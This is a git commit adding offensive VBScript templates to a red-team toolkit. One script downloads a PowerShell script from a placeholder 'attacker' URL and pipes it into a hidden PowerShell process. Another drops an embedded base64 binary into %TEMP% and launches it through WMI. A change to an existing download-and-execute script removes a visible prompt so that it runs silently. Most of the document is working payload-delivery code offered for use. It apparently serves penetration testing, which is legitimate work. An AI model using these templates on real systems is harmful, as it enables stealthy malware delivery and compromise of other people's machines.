Added code-exec-templates and some additions to rogue-dot-net

This commit is contained in:
mgeeky 2020-05-07 01:42:52 +02:00
parent b7c7da7b4e
commit 8b03b5ba40
14 changed files with 806 additions and 723 deletions

View File

@ -15,6 +15,10 @@ Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets usin
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run` - **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create` - **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window. - **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.

View File

@ -29,9 +29,7 @@ If xhr.Status = 200 Then
' STEP 3: Execute file ' STEP 3: Execute file
cmd = out & " " & parameters cmd = out & " " & parameters
MsgBox cmd
sh.Run cmd, 0, False sh.Run cmd, 0, False
End If End If
Set sh = Nothing Set sh = Nothing

View File

@ -0,0 +1,34 @@
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
scriptURL = "http://attacker/script.ps1"
launcher = "powershell -nop -w hid -Command -"
Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", scriptURL, False
xhr.Send
Function bin2a(Binary)
Dim I,S
For I = 1 to LenB(Binary)
S = S & Chr(AscB(MidB(Binary,I,1)))
Next
bin2a = S
End Function
If xhr.Status = 200 Then
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine bin2a(xhr.responseBody)
.StdIn.WriteBlankLines 1
.Terminate
End With
End With
End If
Set xhr = Nothing

View File

@ -0,0 +1,47 @@
'
' Example of dropping an embedded, base64 encoded binary file to the disk,
' decoding it and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
saveFileAs = "%TEMP%\foo.exe"
launchParameters = ""
' =============================================================
fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
' =============================================================
Function Base64Decode(ByVal vCode)
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = oNode.nodeTypedValue
Set oNode = Nothing
End Function
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveFileAs)
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write Base64Decode(fileBuffer)
.savetofile out, 2
End With
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
command = out & " " & launchParameters
proc.Create command, Null, conf, intProcessID